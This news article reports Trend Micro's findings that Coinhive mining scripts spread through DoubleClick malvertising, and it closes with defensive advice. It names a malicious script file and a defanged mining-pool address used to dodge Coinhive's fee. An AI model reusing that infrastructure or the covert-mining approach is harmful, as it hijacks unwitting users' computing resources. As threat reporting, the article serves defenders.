Warning over Coinhive cryptocurrency mining malware exploiting Google's DoubleClick online ad network

Coinhive cryptocurrency mining malware tripled in January, warns Trend Micro

The number of Coinhive web miner detections has tripled as a result of aggressive "malvertising campaigns" being run over online advertising networks, according to security firm Trend Micro.

Researchers at the company recently found that cyber crooks are deploying advertisements on high-traffic websites that use Coinhive as well as separate web mining services that connect to private pools.

Attackers are also tapping into Google's DoubleClick advertising network, which dominates online advertising. Countries particularly affected include Japan, France, Taiwan, Italy, and Spain, Trend Micro claimed.

Blocking JavaScript-based applications from running on browsers can prevent Coinhive miners from using CPU resources

The firm said that it has disclosed its findings to Google. "We detected an almost 285 per cent increase in the number of Coinhive miners on 24 January. We started seeing an increase in traffic to five malicious domains on 18 January," it said.

"After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements."

After analysing 'malvertisement'-riddled pages, the security specialists identified two different web miner scripts, as well as one that displays advertisements using DoubleClick.

The webpages deceive users by showing legitimate advertisements while "the two web miners covertly perform their tasks". They're unaware that this is happening.

Trend Micro explained: "We speculate that the attackers' use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices."

The adverts use a JavaScript code "that generates a random number between variables 1 and 101". It's capable of mining 80 per cent of a computer's CPU power, said the firm.

"After de-obfuscating the private web miner called mqoj_1.js, there will be a JavaScript code that is still based on Coinhive," explained the firm.

"The modified web miner will use a different mining pool at wss[:]//ws[.]l33tsite[.]info[:]8443. This is done to avoid Coinhive's 30% commission fee."

To avoid this issue, Trend Micro continued: "Blocking JavaScript-based applications from running on browsers can prevent Coinhive miners from using CPU resources," added the firm.

"Regularly patching and updating software - especially web browsers - can mitigate the impact of cryptocurrency malware and other threats that exploit system vulnerabilities."